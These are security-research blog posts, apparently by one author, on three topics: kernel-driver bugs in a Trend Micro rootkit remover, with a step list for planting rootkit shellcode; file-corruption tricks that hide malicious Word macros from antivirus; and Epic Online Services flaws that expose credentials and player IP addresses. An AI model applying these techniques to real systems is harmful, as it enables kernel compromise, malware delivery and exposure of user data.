To make our lives easier, Trend Micro conveniently included a significant amount of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.

OperationCode PrimaryRoutine Description
2713h IoControlCreateFile Calls NtCreateFile, all parameters are controlled by the request.
2711h IoControlFindNextFile Returns STATUS_NOT_SUPPORTED.
2710h IoControlFindFirstFile Performs nothing, returns STATUS_SUCCESS always.
2712h IoControlFindCloseFile Calls ZwClose, all parameters are controlled by the request.
2715h IoControlReadFileIRPNoCache References a FileObject using HANDLE from request. Calls IofCallDriver and reads result.
2714h IoControlCreateFileIRP Creates a new FileObject and associates DeviceObject for requested drive.
2716h IoControlDeleteFileIRP Deletes a file by sending an IRP_MJ_SET_INFORMATION request.
2717h IoControlGetFileSizeIRP Queries a file's size by sending an IRP_MJ_QUERY_INFORMATION request.
2718h IoControlSetFilePosIRP Set's a file's position by sending an IRP_MJ_SET_INFORMATION request.
2719h IoControlFindFirstFileIRP Returns STATUS_NOT_SUPPORTED.
271Ah IoControlFindNextFileIRP Returns STATUS_NOT_SUPPORTED.
2720h IoControlQueryFile Calls NtQueryInformationFile, all parameters are controlled by the request.
2721h IoControlSetInformationFile Calls NtSetInformationFile, all parameters are controlled by the request.
2722h IoControlCreateFileOplock Creates an Oplock via IoCreateFileEx and other filesystem API.
2723h IoControlGetFileSecurity Calls NtCreateFile and then ZwQuerySecurityObject. All parameters are controlled by the request.
2724h IoControlSetFileSecurity Calls NtCreateFile and then ZwSetSecurityObject. All parameters are controlled by the request.
2725h IoControlQueryExclusiveHandle Check if a file is opened exclusively.
2726h IoControlCloseExclusiveHandle Forcefully close a file handle.

IoControlCode == 90004027h

Discovery

This dispatch table is primarily used to control the driver's process scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.

OperationCode PrimaryRoutine Description
C350h GetProcessesAllMethods Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.
C351h DeleteTaskResults* Delete results obtained through other functions like GetProcessesAllMethods.
C358h GetTaskBasicResults* Further parse results obtained through other functions like GetProcessesAllMethods.
C35Dh GetTaskFullResults* Completely parse results obtained through other functions like GetProcessesAllMethods.
C360h IsSupportedSystem Returns TRUE if the system is "supported" (whether or not they have hardcoded offsets for your build).
C361h TryToStopTmComm Attempt to stop the driver.
C362h GetProcessesViaMethod Find processes via a specified method.
C371h CheckDeviceStackIntegrity Check for tampering on devices associated with physical drives.
C375h ShouldRequireOplock Returns TRUE if oplocks should be used for certain scans.

These IOCTLs revolve around a few structures I call "MicroTask" and "MicroScan". Here are the structures reverse-engineered:

struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always 'PANS'.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};

For most of the IOCTLs in this sub dispatch table, a MicroScan is passed in by the client which the driver populates. We'll look into how we can abuse this trust in the next section.

Exploitation

When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code "didn't seem right". It appeared like the MicroScan kernel pointer returned by functions such as GetProcessesAllMethods was being directly passed onto other functions such as DeleteTaskResults by the client. These functions would then take this untrusted kernel pointer and with almost no validation call functions in the virtual function table specified at the base of the class.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Taking a look at the "validation routine" for the DeleteTaskResults sub dispatch table entry, the only validation performed on the MicroScan instance specified at the input buffer + 0x10 was making sure it was a valid kernel address.

How to use Trend Micro's Rootkit Remover to Install a Rootkit
How to use Trend Micro's Rootkit Remover to Install a Rootkit
How to use Trend Micro's Rootkit Remover to Install a Rootkit

The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in DeleteTaskResults to make sure the Tag member of the MicroScan is PANS.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Since DeleteTaskResults calls the constructor specified in the virtual function table of the MicroScan instance, to call an arbitrary kernel function we need to:

  1. Be able to allocate at least 10 bytes of kernel memory (for vtable and tag).
  2. Control the allocated kernel memory to set the virtual function table pointer and the tag.
  3. Be able to determine the address of this kernel memory from user-mode.

Fortunately a mentor of mine, Alex Ionescu, was able to point me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A HackInTheBox Magazine from 2010 had an article by Matthew Jurczyk called "Reserve Objects in Windows 7". This article discussed using APC Reserve Objects, which was introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you can queue an Apc to an Apc Reserve Object with the ApcRoutine and ApcArgumentX members being the data you want in kernel memory and then use NtQuerySystemInformation to find the Apc Reserve Object in kernel memory. This reserve object will have the previously specified KAPC variables in a row, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of the kernel memory. I would strongly suggest reading the article if you'd like to learn more.

This trick still works in Windows 10, meaning we're able to meet all three requirements. By using an Apc Reserve Object, we can allocate at least 10 bytes for the MicroScan structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Although I provided a specific example of vulnerable code in DeleteTaskResults, any of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the MicroScan instance's virtual function table.

IoControlCode == 90004033h

Discovery

This next sub dispatch table primarily manages the TrueApi class we reviewed before.

OperationCode PrimaryRoutine Description
EA60h IoControlGetTrueAPIPointer Retrieve pointers of functions in the TrueApi class.
EA61h IoControlGetUtilityAPIPointer Retrieve pointers of utility functions of the driver.
EA62h IoControlRegisterUnloadNotify* Register a function to be called on unload.
EA63h IoControlUnRegisterUnloadNotify Unload a previously registered unload function.

Exploitation

IoControlRegisterUnloadNotify

This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an untrusted client can register up to 16 arbitrary "unload routines" that get called when the driver unloads. This function's validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls ProbeForRead on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.

This function cannot immediately be used in an exploit from user-mode. The problem is that if we're a user-mode caller, we must provide a user-mode pointer, because the validator routine uses ProbeForRead. When the driver unloads, this user-mode pointer gets called, but it won't do much because of mitigations such as SMEP. I'll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer by design.

IoControlCode == 900040DFh

This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.

OperationCode PrimaryRoutine Description
15F90h IoControlReadFile Read a file directly from a disk.
15F91h IoControlUpdateCoreList Update the kernel pointers used by the Xray Api.
15F92h IoControlGetDRxMapTable Get a table of drives mapped to their corresponding devices.

IoControlCode == 900040E7h

Discovery

The final sub dispatch is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for including hooks in object types, major function tables, and even function inline hooks.

OperationCode PrimaryRoutine Description
186A0h TMXMSCheckSystemRoutine Check a few system routines for hooks.
186A1h TMXMSCheckSystemFileIO Check file IO major functions for hooks.
186A2h TMXMSCheckSpecialSystemHooking Check the file object type and ntoskrnl Io functions for hooks.
186A3h TMXMSCheckGeneralSystemHooking Check the Io manager for hooks.
186A4h TMXMSCheckSystemObjectByName Recursively trace a system object (either a directory or symlink).
186A5h TMXMSCheckSystemObjectByName2* Copy a system object into user-mode memory.

Exploitation

Yeah, TMXMSCheckSystemObjectByName2 is as bad as it sounds. Before looking at the function directly, here's a few reverse engineered structures used later:

struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};

TMXMSCheckSystemObjectByName2 takes in a Source pointer, Destination pointer, and a Size in bytes. The validator function called for TMXMSCheckSystemObjectByName2 checks the following:

  • ProbeForRead on the CheckParams member of the TXMSParams structure.
  • ProbeForRead and ProbeForWrite on the Dst member of the CheckSystemObjectParams structure.

Essentially, this means that we need to pass a valid CheckParams structure and the Dst pointer we pass is in user-mode memory. Now let's look at the function itself:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Although that for loop may seem scary, all it is doing is an optimized method of checking a range of kernel memory. For every memory page in the range Src to Src + Size, the function calls MmIsAddressValid. The real scary part is the following operations:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

These lines take an untrusted Src pointer and copies Size bytes to the untrusted Dst pointer... yikes. We can use the memmove operations to read an arbitrary kernel pointer, but what about writing to an arbitrary kernel pointer? The problem is that the validator for TMXMSCheckSystemObjectByName2 requires that the destination is user-mode memory. Fortunately, there is another bug in the code.

The next *params->OutSize = Size; line takes the Size member from our structure and places it at the pointer specified by the untrusted OutSize member. No verification is done on what OutSize points to, thus we can write up to a DWORD each IOCTL call. One caveat is that the Src pointer would need to point to valid kernel memory for up to Size bytes. To meet this requirement, I just passed the base of the ntoskrnl module as the source.

Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we're calling from user-mode, we don't actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver's .data section using our write primitive and place the pointer we want.

Really, really bad code

Typically, I like sticking to strictly security in my blog posts, but this driver made me break that tradition. In this section, we won't be covering the security issues of the driver, rather the terrible code that's used by millions of Trend Micro customers around the world.

Bruteforcing Processes

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Let's take a look at what's happening here. This function has a for loop from 0 to 0x10000, incrementing by 4, and retrieves the object of the process behind the current index (if there is one). If the index does match a process, the function checks if the name of the process is csrss.exe. If the process is named csrss.exe, the final check is that the session ID of the process is 0. Come on guys, there is literally documented API to enumerate processes from kernel... what's the point of bruteforcing?

Bruteforcing Offsets

EPROCESS ImageFileName Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

When I first saw this code, I wasn't sure what I was looking at. The function takes the current process, which happens to be the System process since this is called in a System thread, then it searches for the string "System" in the first 0x1000 bytes. What's happening is... Trend Micro is bruteforcing the ImageFileName member of the EPROCESS structure by looking for the known name of the System process inside of its EPROCESS structure. If you wanted the ImageFileName of a process, just use ZwQueryInformationProcess with the ProcessImageFileName class...

EPROCESS Peb Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

In this function, Trend Micro uses the PID of the csrss process to brute force the Peb member of the EPROCESS structure. The function retrieves the EPROCESS object of the csrss process by using PsLookupProcessByProcessId and it retrieves the PebBaseAddress by using ZwQueryInformationProcess. Using those pointers, it tries every offset from 0 to 0x2000 that matches the known Peb pointer. What's the point of finding the offset of the Peb member when you can just use ZwQueryInformationProcess, as you already do...

ETHREAD StartAddress Offset

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Here Trend Micro uses the current system thread with a known start address to brute force the StartAddress member of the ETHREAD structure. Another case where finding the raw offset is unnecessary. There is a semi-documented class of ZwQueryInformationThread called ThreadQuerySetWin32StartAddress which gives you the start address of a thread.

Unoptimized Garbage

How to use Trend Micro's Rootkit Remover to Install a Rootkit

When I initially decompiled this function, I thought IDA Pro might be simplifying a memset operation, because all this function was doing was setting all of the TrueApi structure members to zero. I decided to take a peek at the assembly to confirm I wasn't missing something...

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Yikes... looks like someone turned off optimizations.

Cheating Microsoft's WHQL Certification

So far we've covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are, there is some NonPagedPool memory allocated which we can use to host and execute our malicious shellcode.

Let's take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a "supported system" by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.

Fortunately, the PoolType global variable which is used to allocate non-paged memory is set to 0 (NonPagedPool) by default. I noticed that although this value was 0 initially, the variable was still in the .data section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system's version also set this PoolType variable in certain cases.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

From a brief glance, it looked like if our operating system is Windows 10 or a newer version, the driver prefers to use NonPagedPoolNx. Good from a security standpoint, but bad for us. This is used for all non-paged allocations, meaning we would have to find a spare ExAllocatePoolWithTag that had a hardcoded NonPagedPool argument otherwise we couldn't use the driver's allocated memory on Windows 10. But, it's not that straightforward. What about MysteriousCheck(), the second requirement for this if statement?

How to use Trend Micro's Rootkit Remover to Install a Rootkit

What MysteriousCheck() was doing was checking if Microsoft's Driver Verifier was enabled... Instead of just using NonPagedPoolNx on Windows 8 or higher, Trend Micro placed an explicit check to only use secure memory allocations if they're being watched. Why is this not just an example of bad code? Trend Micro's driver is WHQL certified:

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Passing Driver Verifier has been a long-time requirement of obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, Trend Micro decided to ignore their user's security and designed their driver to cheat any testing or debugging environment which would catch such violations.

Honestly, I'm dumbfounded. I don't understand why Trend Micro would go out of their way to cheat in these tests. Trend Micro could have just left the Windows 10 check, why would you even bother creating an explicit check for Driver Verifier? The only working theory I have is that for some reason most of their driver is not compatible with NonPagedPoolNx and that only their entrypoint is compatible, otherwise there really isn't a point.

Delivering on my promise

As I promised, you can use Trend Micro's driver to install your own rootkit. Here is what you need to do:

  1. Find any NonPagedPool allocation by the driver. As long as you don't have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the .data section. Preferably, pick an allocation that isn't used often.
  2. Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in TMXMSCheckSystemObjectByName2.
  3. Execute your shellcode by registering an unload routine (directly in .data) or using the several other execution methods present in the 90004027h dispatch table.

It's really as simple as that.

Conclusion

I reverse a lot of drivers and you do typically see some pretty dumb stuff, but I was shocked at many of the findings in this article coming from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.

Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside of the IOCTL handlers includes very risky DKOM. Also, I'm not sure how certain practices such as bruteforcing anything would get through adequate code review processes. For example, the Bruteforcing Processes code doesn't make sense, are Trend Micro developers not aware of enumerating processes via ZwQuerySystemInformation? What about disabling optimizations? Anti-virus already gets flak for slowing down client machines, why would you intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won't be a Trend Micro customer anytime soon.

Defeating Macro Document Static Analysis with Pictures of My Cat

16 September 2020 at 11:33
Defeating Macro Document Static Analysis with Pictures of My Cat

Over the past few weeks I've spent some time learning Visual Basic for Applications (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, how does anti-virus detect a malicious macro?

The hypothesis I came up with was that anti-virus would parse out macro content from the word document and scan the macro code for a variety of malicious techniques, nothing crazy. A common pattern I've seen attackers counter this sort-of detection is through the use of macro obfuscation, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.

The questions I wanted answered were:

  1. How does anti-virus even retrieve the macro content?
  2. What differences are there for the retrieval of macro content between the implementation in Microsoft Word and anti-virus?

Discovery

According to Wikipedia,Open Office XML (OOX) "is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents". This is the file format used for the common Microsoft Word extensions docx and docm. The fact that Microsoft Office documents were essentially a zip file of XML files certainly piqued my interest.

Since the OOX format is just a zip file, I found that parsing macro content from a Microsoft Word document was simpler than you might expect. All an anti-virus would need to do is:

  1. Extract the Microsoft Office document as a ZIP and look for the file word\vbaProject.bin.
  2. Parse the OLE binary and extract the macro content.

The differences I was interested in was how the methods would handle errors and corruption. For example, common implementations of ZIP extraction will often have error checking such as:

  1. Does the local file header begin with the signature 0x04034b50?
  2. Is the minimum version bytes greater than what is supported?

What I was really after was finding ways to break the ZIP parser in anti-virus without breaking the ZIP parser used by Microsoft Office.

Before we get into corrupting anything, we need a base sample first. As an example, I simply wrote a basic macro "Hello World!" that would appear when the document was opened.

Defeating Macro Document Static Analysis with Pictures of My Cat

For the purposes of testing detection of macros, I needed another sample document that was heavily detected by anti-virus. After a quick google search, I found a few samples shared by @malware_traffic here. The sample named HSOTN2JI.docm had the highest detection rate, coming in at 44/61 engines marking the document as malicious.

Defeating Macro Document Static Analysis with Pictures of My Cat

To ensure that detections were specifically based on the malicious macro inside the document's vbaProject.bin OLE file, I...

  1. Opened both my "Hello World" and the HSOTN2JI macro documents as ZIP files.
  2. Replaced the vbaProject.bin OLE file in my "Hello World" macro document with the vbaProject.bin from the malicious HSOTN2JI macro document.

Running the scan again resulted in the following detection rate:

Defeating Macro Document Static Analysis with Pictures of My Cat

Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. Now with a base malicious sample, we can begin tampering with the document.

Exploitation

The methodology I used for the methods of corruption is:

  1. Modify the original base sample file with the corruption method.
  2. Verify that the document still opens in Microsoft Word.
  3. Upload the new document to VirusTotal.
  4. If good results, retry the method on my original "Hello World" macro document and verify that the macro still works.

Before continuing, it's important to note that the methods discussed in this blog post does come with drawbacks, specifically:

  1. Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they'd like to recover the document:
Defeating Macro Document Static Analysis with Pictures of My Cat
  1. Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.

Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they'd probably also be willing to recover the document.

General Corruption

We'll first start with the effects of general corruption on a Microsoft Word document. What I mean by this is I'll be corrupting the file using methods that are non-specific to the ZIP file format.

First, let's observe the impact of adding random bytes to the beginning of the file.

Defeating Macro Document Static Analysis with Pictures of My Cat
Defeating Macro Document Static Analysis with Pictures of My Cat

With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.

Result: 33% decrease in detection

Prepending My Cat

This time, let's do the same thing except prepend a JPG file, in this case, a photo of my cat!

Defeating Macro Document Static Analysis with Pictures of My Cat

You might think that prepending some random data should result in the same detection rate as an image, but some anti-virus marked the file as clean as soon as they saw an image.

Defeating Macro Document Static Analysis with Pictures of My Cat

To aid in future research, the anti-virus engines that marked the random data document as malicious but did not mark the cat document as malicious were:

Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32

The reason this list is larger than the actual difference in detection is because some engines strangely detected this cat document, but did not detect the random data document.

Result: 50% decrease in detection

Prepending + Appending My Cat

Purely appending data to the end of a macro document barely impacts the detection rate, instead we'll be combining appending data with other methods starting with my cat.

Defeating Macro Document Static Analysis with Pictures of My Cat

What was shocking about all of this was even when the ZIP file was in the middle of two images, Microsoft's parser was able to reliably recover the document and macro! With only extremely basic modification to the document, we were able to essentially prevent most detection of the macro.

Result: 88% decrease in detection

Zip Corruption

Microsoft's fantastic document recovery is not just exclusive to general methods of file corruption. Let's take a look at how it handles corruption specific to the ZIP file format.

Corrupting the ZIP Local File Header

The only file we care about preventing access to is the vbaProject.bin file, which contains the malicious macro. Without corrupting the data, could we corrupt the file header for the vbaProject.bin file and still have Microsoft Word recognize the macro document?

Let's take a look at the structure of a local file header from Wikipedia:

Defeating Macro Document Static Analysis with Pictures of My Cat

I decided that the local file header signature would be the least likely to break file parsing, hoping that Microsoft Word didn't care whether or not the file header had the correct magic value. If Microsoft Word didn't care about the magic, corrupting it had a high chance of interfering with ZIP parsers that have integrity checks such as verifying the value of the magic.

After corrupting only the file header signature of the vbaProject.bin file entry, we get the following result:

Defeating Macro Document Static Analysis with Pictures of My Cat
Defeating Macro Document Static Analysis with Pictures of My Cat

With a ZIP specific corruption method, we almost completely eliminated detection.

Result: 90% decrease in detection

Combining Methods

With all of these methods, we've been able to reduce static detection of malicious macro documents quite a bit, but it's still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!

Method Detection Rate Decrease
Prepending Random Bytes 33%
Prepending an Image 50%
Prepending and Appending an Image 88%
Corrupting ZIP File Header 90%
Prepending/Appending Image and Corrupting ZIP File Header 100%

Interested in trying out the last corruption method that reduced detection by 100%? I made a script to do just that! To use it, simply execute the script providing document filename as the first argument and a picture filename for the second parameter. The script will spit out the patched document to your current directory.

As stated before, even though these methods can bring down the detection of a macro document to 0%, it comes with high costs to attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will widely depend on the environment you're against.

Regardless, one must heavily applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even when compared to tools that are specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

17 December 2020 at 16:07
Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was Satisfactory, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with Factorio, another logistics-oriented game, Satisfactory seemed like a perfect fit!

Satisfactory had a unique feature that I rarely see in games today, peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach of having dedicated servers serving multiple clients instead of the peer-to-peer model where clients serve each other.

I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always "stay curious" with anything I interact with. This was a perfect opportunity to exercise that curiosity!

Introduction

When analyzing the communication of any application, a great place to start is to attempt to intercept the HTTP traffic. Often times applications won't use an overly complicated protocol if they don't need to and web requests happen to be one of the most common ways of communicating. For intercepting not only plaintext traffic, I used Fiddler by Telerik which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of installing the root certificate it would use to issue certificates for websites automatically, but the question was if Satisfactory used a platform that had certificate pinning. Only one way to find out!

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from Coffee Stain Games, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately did not contain sensitive information.

Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

In the first request to Epic Games' API servers, there are a few interesting headers that indicate what service this could be in connection to. Specifically the User-Agent and Miscellaneous headers referred to something called "EOS". A quick Google search revealed that this stood for Epic Online Services!

Discovery

Epic Online Services is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, peer-to-peer functionality, etc; there are many attractive features the service offers to game developers.

Before we continue with any security review, it's important to have a basic conceptual understanding of the product you're reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.

First, let's take a look at how you authenticate with the Epic Online Services API (EOS-API). According to documentation, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the GameServer or GameClient role , which are expected to be hardcoded into the server/client binary:

The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.

I found it peculiar that the only "client roles" that existed were GameServer and GameClient. The GameClient role "can access EOS information, but typically can't modify it", whereas the GameServer role "is a server or secure backend intended for administrative purposes". If you're writing a peer-to-peer game, what role do you give clients?

GameClient credentials won't work for hosting sessions, given that it's meant for read-only access, but  GameServer credentials are only meant for "a server or secure backend". A peer-to-peer client is neither a server nor anything I'd call "secure", but Epic Games effectively forces developers to embed GameServer credentials, because otherwise how can peer-to-peer clients host sessions?

The real danger here is that the documentation falsely assumes that if a client has GameServer role,  it should be trusted, when in fact the client may be an untrusted P2P client. I was amused by the fact that Epic Games even gives an example of the problem with giving untrusted clients the GameServer role:

The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. For example, an EOS Client with a role of GameServer could unlock Achievements for a player.

Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

In the authentication request above, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string provides a username:password combination, which represents the client credentials. With such little effort, we are able to obtain credentials for the GameServer role giving significant access to the backend used for Satisfactory. We'll take a look at what we can do with GameServer credentials in a later section.

Since we're interested in peer-to-peer sessions/matchmaking, the next place to look is the "Sessions interface", which "gives players the ability to host, find, and interact with online gaming sessions". This Sessions interface can be obtained through the Platform interface function EOS_Platform_GetSessionsInterface. The core components of session creation that are high value targets include session creation, session discovery, and joining a session. Problems in these processes could have significant security impact.

Discovery: Session Creation

The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.

First, you create a EOS_Sessions_CreateSessionModificationOptions structure that contains the following information:

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Finally, you need to pass this structure to the EOS_Sessions_CreateSessionModification function to create the session. Although this function will end up creating your session, there is a significant amount you can configure about a session given that the initial structure passed only contains required information to create a barebone session.

Discovery: Finding Sessions

For example, let's talk about how matchmaking works with these sessions. A major component of Sessions is the ability to add "custom attributes":

Sessions can contain user-defined data, called attributes. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value's type, and a visibility setting.

These "attributes" are what allows developers to add custom information about a session, such as the map the session is for or what version the host is running at.

EOS makes session searching simple. Similar to session creation, to create a barebone "session search", you simply call EOS_Sessions_CreateSessionSearch with a EOS_Sessions_CreateSessionSearchOptions structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.

Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for session based on:

  • A known unique session identifier (at least 16 characters in length).
  • A known unique user identifier.
  • Session Attributes.

Although you can use a session identifier or a user identifier if you're joining a known specific session, for matchmaking purposes, attributes are the only way to "discover" sessions based on user-defined data.

Discovery: Sensitive Information Disclosure

Satisfactory isn't a matchmaking game and you'd assume they'd use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier. Instead they forced game developers to use their randomly generated 32 character session ID.

When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?

Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and choose to use attributes to store a session identifier. Being honest, who wants to share a random 32 character string with friends?

I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Here is the request performed when I attempted to join a session with the identifier "test123":

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [
    {
      "key": "attributes.NUMPUBLICCONNECTIONS_l",
      "op": "GREATER_THAN_OR_EQUAL",
      "value": 1
    },
    {
      "key": "bucket",
      "op": "EQUAL",
      "value": "Satisfactory_1.0.0"
    },
    {
      "key": "attributes.FOSS=SES_CSS_SESSIONID_s",
      "op": "EQUAL",
      "value": "test123"
    }
  ],
  "maxResults": 2
}

Of course, this returned no valid sessions, but this request interestingly revealed that the mechanism used for finding sessions was based on a set of criteria. I was curious, how much flexibility did the EOS-API give the client when it comes to this criteria?

Exploitation: Sensitive Information Disclosure

The first idea I had when I saw that filtering was based on an array of "criteria" was what happens when you specify no criteria? To my surprise, the EOS-API was quite accommodating:

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Although sessions in Satisfactory are advertised to be "Friends-Only", I was able to enumerate all sessions that weren't set to "Private". Along with each session, I am given the IP Address for the host and their user identifier. On a large-scale basis, an attacker could easily use this information to create a map of most players.

To be clear, this isn't just a Satisfactory issue. You can enumerate the sessions of any game you have at least GameClient credentials for. Obviously in a peer-to-peer model, other players have the potential to learn your IP Address, but the problem here is that it is very simple to enumerate the thousands of sessions active given that besides the initial authentication, there are literally no access controls (not even rate-limiting). Furthermore, to connect to another client through the EOS-API, you don't even need to have the IP Address of the host!

Discovery: Session Hijacking

Going back to what we're really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the "Sending and Receiving Data Through P2P Connections" section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:

  1. Product user ID - This "identifies player data for an EOS user within the scope of a single product".
  2. Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character "session identifier".

Now that we know what data we need, the next step is understanding how the game itself shares these details between players.

One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of "Attributes", described by documentation to be a critical part of session discovery:

The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player's estimated skill level to find matches with appropriate opponents.

